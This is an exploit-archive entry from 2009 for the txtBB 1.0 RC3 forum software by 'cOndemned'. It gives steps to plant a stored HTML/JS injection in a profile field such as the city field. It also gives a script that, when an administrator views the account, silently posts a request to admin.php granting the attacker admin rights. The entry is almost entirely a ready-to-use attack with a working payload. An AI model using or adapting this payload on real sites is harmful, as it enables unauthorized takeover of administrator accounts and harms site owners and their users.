txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit

2009-02-05T00:00:00
ID 1337DAY-ID-4806
Type zdt
Reporter cOndemned
Modified 2009-02-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
=================================================================


<!--

txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
By cOndemned


Exploitation:
	1. Create an account 
	2. Go to http://[host]/[txtbb10RC3_path]/index.php?type=account 
	3. Put exploit code into one of the fields ex. "Miasto" ([code] + City name)
	4. When admin enters U'r account - pwn3d - Your user will get admin rights


Exploit Source :

-->

<script>

var req = new XMLHttpRequest(); 

req.open('POST', 'admin.php?action=users&type=edit&login=USER_NICK&save=1', false); 
req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); 
req.send('signature=&avatar=&type=3&password=&submit=Zapisz');

</script>



#  0day.today [2018-04-08]  #